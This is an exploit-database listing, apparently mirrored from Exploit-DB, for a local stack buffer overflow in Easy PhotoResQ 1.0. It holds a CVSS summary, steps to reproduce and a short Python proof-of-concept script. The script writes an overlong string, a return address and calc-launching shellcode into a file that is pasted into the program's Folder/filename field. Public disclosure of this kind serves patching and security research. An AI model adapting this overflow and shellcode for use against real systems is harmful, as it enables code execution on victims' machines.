header-logo
Suggest Exploit
vendor:
Easy Photoresq
by:
Cemal Cihad ÇİFTÇİ
9.3
CVSS
HIGH
Local Buffer Overflow
119
CWE
Product Name: Easy Photoresq
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:easyphotoresq:easy_photoresq:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows XP Professional Service Pack 3
2018

Easy PhoroResQ 1.0 – Buffer Overflow (PoC)

A buffer overflow vulnerability exists in Easy PhoroResQ 1.0, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error within the application when handling user-supplied input. This can be exploited to cause a stack-based buffer overflow via an overly long, specially-crafted string passed to the 'Folder/filename' field. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of Easy PhoroResQ 1.0
Source

Exploit-DB raw data:

# Exploit Title: Easy PhoroResQ 1.0 - Buffer Overflow (PoC)
# Discovery by: Cemal Cihad ÇİFTÇİ
# Discovery Date: 2018-09-24
# Tested Version: 1.0
# Vulnerability Type: Local Buffer Overflow
# Tested on OS: Windows XP Professional Service Pack 3
# Vendor Homepage: http://www.easyphotoresq.com/
# Download Link: http://www.easyphotoresq.com/download.html
# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "boom.txt". Copy the content of the new file "boom.txt". 
# Now start the program. Now when you are inside of the programwindow #click "File" > "Options". 
# In the field: "Folder/filename" paste the copied #content from "boom.txt". 
# Now click "OK" and calc.exe will appear.

#!/usr/bin/python

buffer = "A" * 1320 + "\xdf\x44\xc6\x4e" + "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"

payload = buffer
try:
    f=open("boom.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

Navigation

Suggest Exploit

Services By CQR